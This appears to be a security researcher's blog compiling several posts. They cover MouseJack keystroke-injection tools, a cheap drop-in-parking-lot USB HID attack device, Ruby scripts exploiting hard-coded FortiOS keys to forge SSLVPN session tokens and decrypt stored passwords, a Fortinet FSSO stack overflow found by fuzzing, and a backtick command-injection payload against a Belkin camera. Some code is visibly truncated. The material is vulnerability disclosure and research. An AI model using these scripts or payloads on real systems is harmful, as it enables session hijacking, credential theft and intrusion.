Summer Projects

Last summer a friend and I worked on some electronics projects so I thought I’d write a post about it.


Marc Newlin and the team over at Bastille released a vulnerability called MouseJack in early 2016. This vulnerability allows an attacker to send keystrokes directly to a wireless mouse or keyboard, similar to a Hak5 Rubber Ducky, but from up to hundreds of meters away.

I found out about the vulnerability around June last year and immediately set about to replicate the research. Shortly after, we published a tool called JackIt.

JackIt is a relatively simple Python script that leverages a CrazyRadio PA USB adapter to inject keystrokes into many Microsoft and Logitech keyboards and mice using the NRF24L01+ protocol. It uses the same HID attack description syntax as the Hak5 Rubber Ducky, called Duckyscript, and you can find example payloads in the project wiki.

Microcontroller MouseJack

After my friend and I wrote the JackIt tool, we realized that carrying around a laptop with a specialized USB radio was a bit sketchy. It would be much more effective to carry around a simple physical key fob that would opportunistically exploit the vulnerability.

In August, after a bit of Arduino tinkering and learning to solder, we found a platform that worked nicely and created a portable version called uC_Mousejack. Depending on the battery size and radio, it can run for up to a day per charge and still manages 25 meters of range.

The microcontroller version uses PlatformIO as the toolchain (which is brilliant), and includes a Python script to compile Duckyscripts into C arrays for easy firmware recompilation.


During the uC_Mousejack project, I discovered that working with simple electronics is a breeze. I’m really surprised that there aren’t more custom hardware-based attacks in common use by penetration testers, especially considering that binary exploitation is a lot more challenging today.

My friend and I once again teamed up for the uDuck project and decided to make a simple PCB. The obvious choice was the USB HID attack popularized by the Hak5 Rubber Ducky. It’s a great attack, but unfortunately I can’t afford to drop a handful of $45 USB devices in a parking lot and hope for the best.

It’s worth mentioning that around the same time, Sensepost released the USaBUSe project. I really like the concept of a more feature rich version, but it doesn’t fit our use case well. We wanted ultra-cheap devices that we can label as “Confidential” and leave in parking lots or around employee smoke-break areas. uDuck is the philosophically opposite approach and embraces minimalism instead.

You can find the Github repo for uDuck here.

The uDuck can be reprogrammed over the same USB port that delivers the attack. To accomplish this, it leverages the Micronucleus bootloader. Essentially, it waits in the bootloader for 2 seconds after being connected, then changes into a keyboard device. The included Python script compiles a Duckyscript payload into a byte array, patches the firmware with the byte array (containing HID codes and delays) and waits for the USB device to be connected. Once connected, the new firmware is uploaded.

No more fishing a microSD card out of a tiny slot and finding a card reader :).

So why is uDuck interesting? The devices can be made for less than $2 in relatively small quantities. It changes the economics of carrying out this attack.


I figured that MouseJack would be obsolete by now — it’s been over a year. Unfortunately it seems many of the vulnerable devices can still be bought in stores. It’s interesting that we find vulnerabilities in information security every day, but the old ones never seem to go away.

Anyway, if you’re in the infosec community don’t be afraid to jump into electronics. In the past, the toolchains for microcontrollers were arcane, the specialized equipment required was expensive and the learning curve was steep. The Arduino community and the momentum behind IoT made all of that a thing of the past.

I highly recommend buying some Feather boards from Adafruit and running through some of their tutorials. If you don’t want to learn C/C++, you can try out other boards like Puck.js (uses Javascript) or the Pycom boards (which use Python).

Bad Crypto

After figuring out how to unpack the binaries in FortiOS (covered in my last post), I noticed most of the functionality is provided by /bin/init, and all other daemons are just symlinks to that one file. So I followed my first instinct and loaded it into IDA.

The first thing one notices is all the xrefs to strcpy and sprintf. Yeah, thar be 0-days. But let’s not get into that just yet.

After a bit of hunting for interesting OpenSSL function xrefs and looking for interesting strings, I noticed there are many hard-coded encryption keys. This isn’t a great practice, it means some aspects of the systems security are governed by “security through obscurity”. In other words, they’re hoping no one will check and see how it works under the hood.

Let’s start with SSLVPN. FortiGate has both web-based and thick client SSLVPN. From my Burp proxy logs, the authentication sequence goes something like this:

  1. The client browses to the FortiGate via HTTPS, and is redirected to /remote/login.
  2. The client issues a POST to /remote/logincheck and is redirected to stage 2 authentication, which appears to be a “host check”.  I’m guessing it has features to verify that AV is installed and that sort of thing.
  3. The host check URL is /remote/hostcheck_install.  It has a few parameters, some of which appear encrypted.

The interesting thing about the host check URL is that this is the URL that actually responds with the Set-Cookie header, issuing the user an authentication cookie. So if you can guess or brute force this URL, you get a valid session. Neat.

Let’s take a look at an example request:

GET /remote/hostcheck_install?auth_type=1&user=76706E75736572&&grpname=76706E&portal=66756C6C2D616363657373&&rip= HTTP/1.1

Okay, so the user, grpname and portal parameters are just hex encoded.  So user, for example, is “vpnuser” in ASCII. But what is the sid parameter?  Can we decode this?

As it turns out, I stumbled upon the code to decrypt the sid (and SVPNCOOKIE) by accident. I notice the string “c25*dc2$dgl#jp^” in the string table of the /bin/init binary, and my curiosity was peaked. After some extensive reversing, here’s some Ruby code to decrypt the sid values, and make new ones:

#!/usr/bin/env ruby
# encoding: binary

require 'openssl'

def get_cipher_key(s)
  sv_cookie_key1 = "\xdf\x19\x79\x86"
  sv_cookie_key2 = "\x38\xba\x40\xdf"
  sv_cookie_hkey = 
    "\xcd\xf1\xfb\x45\xdc\x85\x37\xba" +
    "\x9d\xce\x58\x45\xc7\xb0\x9e\x62" +
    "\x46\x2a\x2a\xb0\xec\x15\x5b\x5b" +
  hmac = OpenSSL::HMAC.digest('sha1', sv_cookie_hkey, s)  
  ks = sv_cookie_key1 + sv_cookie_key2 + hmac[0,8]
  iv = hmac[0,16]
  [ks, iv]

def encode_sid(sid)  
  secret = "c25*dc2$dgl#jp^"
  sid += OpenSSL::HMAC.digest('sha1', secret, sid)
  cipher ='camellia-128-cbc')

  cipher.key, cipher.iv = get_cipher_key(secret)
  cookie = cipher.update(sid)
  cookie <<

def decode_sid(sid)
  sid = sid.scan(/../).map { |x| x.hex.chr }.join
  secret = "c25*dc2$dgl#jp^"
  cipher ='camellia-128-cbc')

  cipher.key, cipher.iv = get_cipher_key(secret)
  cookie = cipher.update(sid)
  cookie <<

puts decode_sid(ARGV[0])

You might be wondering — what’s up with the get_cipher_key function? I think this is their crude attempt at obfuscation. The translation to ruby is fairly literal, so I left this as is. But yes, they actually derive the key at runtime, to make my life a little more interesting.

If you run the script with a valid sid parameter as an argument, you should get similar output to the following:


Neat. So it appears each value is encoded with a 4-digit length field, then the value. The vaules seem to be serial number, username, user group, portal name, IP address, some zeros (probably the realm), a “1”, and the epoch time stamp (twice). Wait… all of this is simple to brute force!

I’ll leave the implementation of a brute force script to the reader, but yeah, it works. There is very little entropy in the sid token. The serial number of a remote FortiGate is simple to obtain. Many of the self-signed certificates on the system set the CN to the serial number, so in most cases it’s as easy as “echo “” | openssl s_client -showcerts -connect <ip address>”.

If that doesn’t work, try spoofing a CAPWAP packet — but that’s a story for another day.

The unix epoch time can be iterated over the last hour or so, and the source address may be known if the target can be observed. NAT means that any person logging in via an airport of coffee shop network has a known source IP. And if you already have credentials to the VPN and just want to login as a different user (with more favorable permissions), it’s dead simple.

While that’s pretty cool, are there any other obvious examples of bad crypto? Another thing that caught my eye is encrypted passwords in the config. Now passwords for admin users are stored using a hash, albeit a weak one (Hashcat will crack the hashes that start with AK1), it’s still not simple to reverse. But take a look at the passwords for other system users:

config user local
 edit "vpnuser"
  set type password
  set passwd-time 2015-09-02 11:45:00
  set passwd ENC XR/8Zk1ztvCtvMCrFT661civgZ3XxLZR0aWUuKCMGYVOk0KXpo41RnA5w/jkY76FzX3bTVWaehMTMypDO0s68a2SVApPvWAUXJKJZsUrU0RKyxa279fBcvVuM6TVYFvOa/INexHo99zbneHEr2O14tyxt5RGLPlVobWMgpJuJTFF1b5UDSbRc5hoS1/4ERHvi+Vazg==

It turns out these are reversible. You can tell because values such as IPSec PSKs (which need to be known in cleartext) are encoded this way. So after some more reversing, I figured out the encryption scheme:

#!/usr/bin/env ruby
# encoding: binary

require 'openssl'
require 'base64'

iv, text   = Base64.decode64(ARGV[0]).unpack("a4a144")
cipher     ='des-cbc').decrypt
cipher.key = "\x34\x7c\x08\x94\xe3\x9b\x04\x6e"
cipher.iv  = iv + "\x00" * 4

pass = cipher.update(text)
eos = pass.index("\x00")

if eos && eos > 0
  pass = pass[0,eos]

puts pass

If you run the code above with the base64 value from the config snippet above, it will decrypt to the value “password”.

The moral of the story is this: don’t use baked-in encryption keys. Use hashes (strong ones) when possible. If that isn’t possible, create keys from random numbers (with good entropy). If that’s not possible, derive keys from a configurable master pass phrase. But don’t ever bake it in and hope no one will reverse engineer your code.

Fuzzing for Domain Admin

Last week Enrique Nissim of Core Security published an article called Analysis of a Remote Code Execution Vulnerability on Fortinet Single Sign On.  Lately I’ve been using Deva Vu Security’s excellent Peach Fuzzer to find vulnerabilities, and I wanted to see how easy this would be to reproduce.

First, I installed Wireshark, Windbg, Peach 3 and FSSO 4.3.143 onto a Windows 2008 R2 server VM.  While Windows 2008 R2 is 64-bit only, FSSO is always 32-bit, which should make writing the exploit simpler.  Next, I loaded up a FortiGate VM and configured FSSO according to the documentation.  All Fortinet products can be downloaded and trialed for 14-days which makes vulnerability hunting a breeze, although you will have to set up an account first.

As indicated by Enrique’s article, FSSO communicates via TCP port 8000.  A Wireshark capture shows the structure of the hello packet:


The capture shows the packet format as follows:

  • A packet header, comprised of 32-bit big endian size field of the whole payload including the size field, a tag value of 80, and a type value of 06.  These tag and type value correspond to a hello packet.
  • TLV-like structures, with the same size, tag, type and value structures.
  • TLVs for version, serial number and an MD5 authentication hash.

Peach fuzzer uses XML to describe how to fuzz a target.  The portion of the XML that describes the packet format is the data model.  Other sections include a state model, which describes stateful protocols (we’re only fuzzing the hello packet), an agent, which describes how to instrument the target, and a test, which describes how to interface with the target.  The full Peach Pit can be found on github.

Running the Peach Pit is simple.  I’ve installed Peach into the directory c:\peach on the Windows 2008 R2 VM.  You can start fuzzing by copying the Pit to the peach directory and running “peach.exe fsso.xml”.

After only 41 fuzz runs, I obtained the following crash:

(13f8.e54): Access violation - code c0000005 (first chance)
eax=fffffffe ebx=00000658 ecx=75e898da edx=1c781104 esi=ffffffff edi=1c7e2ce8
eip=41414141 esp=1cbbfe1c ebp=00000000 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
41414141 ??              ???

Textbook stack buffer overflow.  To make the situation worse, two modules in the FSSO service do not use ASLR:


So we know we can get 0x41414141, and we know we have at least two modules that do not have ASLR enabled, and one of them contains address values with no nulls, which is perfect for a ROP chain.

FSSO usually runs as domain administrator.  If we’re able to exploit this service we effectively have control over the entire network.  While Fortinet might not be a common household name like Cisco or Microsoft, Fortinet has sold over a million firewalls and FSSO is widely deployed.  It is also quite likely that there are other vulnerabilities in this service, such as the DCAgent protocol running on UDP port 8002 (which is also enabled by default).  Next week I’ll demonstrate how to build a working Metasploit module for this vulnerability, and we’ll try some fuzzing of the DCAgent protocol.

Universal Plug and Fuzz

Earlier this week I bought a Belkin Netcam HD web camera.  It’s probably the most insecure device I ever tested, or even heard about. With the firmware that comes pre-loaded, the telnet service is wide open as root. There’s also an undocumented web interface. The default password is admin:admin, and it’s hard coded.  This means that regardless of how the user sets the device up, an attacker can simply browse to /apcam/apcam/jsstream.asp and watch the video stream.

These issues were reported to Belkin and are fixed in the latest firmware. In the new firmware release, the web administration pages are gone and telnet is disabled. There may be some vulnerabilities left there, but I decided to look at another vector instead: Universal Plug and Play. Belkin WeMo devices are controlled by UPnP, and it appears that the Netcam supports the full WeMo UPnP API.  This makes the attack surface fairly large and manual fuzzing a bit cumbersome.

UFuzzlogoWith that in mind, I’ve created a new UPnP enumeration and fuzzing framework, called UFuzz (Universal Plug and Fuzz). Since the readme in the github repo is pretty short, this seems like a good time to see how UFuzz works.

In order to fuzz the Belkin Netcam, simply configure the device to connect to your wireless network, and issue the follow command to start UFuzz:

./ufuzz -u -v 4

The -u option starts UPnP mode, and the “-v 4” option changes the verbosity to TRACE. This allows us to see the requests and response summaries during fuzzing.

When UFuzz starts, it will broadcast an MSEARCH via UDP to discover all of the devices on the subnet. It will then download and parse of the XML service description files. Next, template requests will be created for each service accessible via UPnP. It’s a bit dumb right now, so it just uses “1” as the default value for each parameter (though you’re welcome to make it smarter).

Finally, it iterates through each parameter using different fuzz values to produce a fault. A fault in UFuzz can be excessive time delay, as is the case for command injection and blind SQL injection payloads, or the target can be instrumented via telnet, serial or syslog to detect exploitable crashes.  Some example modules have been included for telnet and serial monitors.

I should mention that UFuzz isn’t just a one trick pony. It can also fuzz Burp proxy logs. This raises the obvious question — Why not just use Burp to detect these issues? Burp is a fantastic web security scanner, but it doesn’t detect a lot of issues specific to embedded systems. For example, if I send a long string of A’s to a specific parameter, it could cause a buffer overflow in the HTTP server or another binary that the HTTP server calls. The server might even answer with a “200 OK” in certain scenarios. By instrumenting the system, we can check logs or serial output for strings like “SIGSEGV” and log appropriately.

In the time it’s taken to write the above paragraphs, UFuzz has found another bug in the Belkin Netcam:

[2014-04-04T16:13:43-07:00 EVENT DETECTED] cmd injection - possible cmd injection - "`ping -c 10`": delay 9.18

Turns out that’s not a false positive. You can try it out yourself with this Metasploit module. I should also mention — it’s quite possible this affects all Belkin WeMo devices. If someone has a WeMo switch, please try it and let me know.

Until next time, happy bug hunting!